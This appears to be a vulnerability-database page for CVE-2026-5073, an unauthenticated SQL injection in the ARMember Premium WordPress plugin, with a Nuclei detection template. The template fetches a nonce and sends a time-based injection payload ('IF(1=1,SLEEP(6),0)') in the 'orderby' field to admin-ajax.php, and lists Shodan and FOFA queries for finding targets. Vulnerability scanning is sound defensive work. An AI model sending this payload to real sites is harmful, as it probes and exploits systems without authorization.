WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection
CVE-2026-5073
Verified
Description
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function.
Severity
Critical
CVSS Score
7.5
Exploit Probability
1%
Affected Product
armember
Published Date
June 9, 2026
Template Author
dhiyaneshdk
CVE-2026-5073.yaml
id: CVE-2026-5073
info:
name: WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection
author: DhiyaneshDk
severity: critical
description: |
The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function.
impact: |
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: |
Update ARMember Premium to version 7.3.2 or later.
reference:
- https://patchstack.com/database/wordpress/plugin/armember/vulnerability/wordpress-armember-premium-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-7-3-1-unauthenticated-sql-injection-vulnerability
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b5f6d2a2-ad3e-4afc-b6fd-745881d85b6b
- https://nvd.nist.gov/vuln/detail/CVE-2026-5073
- https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-5073
epss-score: 0.01383
epss-percentile: 0.69109
cwe-id: CWE-89
metadata:
verified: true
max-request: 3
vendor: reputeinfosystems
product: armember
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/armember-membership/"
fofa-query: body="/wp-content/plugins/armember-membership/"
tags: cve,cve2026,sqli,time-based-sqli,wordpress,wp,wp-plugin,armember,unauth,vkev
flow: |
http("detect") && http("get-nonce") && http("sqli")
http:
- id: detect
method: GET
path:
- "{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt"
matchers:
- type: word
words:
- "ARMember"
internal: true
- id: get-nonce
method: GET
path:
- "{{BaseURL}}/index.php?rest_route=/wp/v2/pages&per_page=100"
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- "name='arm_wp_nonce'[^>]*value='([a-f0-9]+)'"
matchers:
- type: word
words:
- "arm_wp_nonce"
internal: true
- id: sqli
raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10¤t_page=1&arm_wp_nonce={{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=6"
- type: word
part: body
words:
- "arm_directory_paging_container"
# digest: 4a0a0047304502202e84822dea2955cc7b5fac828ee7f194c52da3435525f9691aa410e64f44ecfb02210083e6624cf0605facd34b9bb24d984eddeed82c41bc44dd51972b94fc42dd77bb:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-5073
CWE ID:
cwe-89
References
https://patchstack.com/database/wordpress/plugin/armember/vulnerability/wordpress-armember-premium-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-7-3-1-unauthenticated-sql-injection-vulnerabilityhttps://www.wordfence.com/threat-intel/vulnerabilities/id/b5f6d2a2-ad3e-4afc-b6fd-745881d85b6bhttps://nvd.nist.gov/vuln/detail/CVE-2026-5073https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056
Remediation Steps
Update ARMember Premium to version 7.3.2 or later.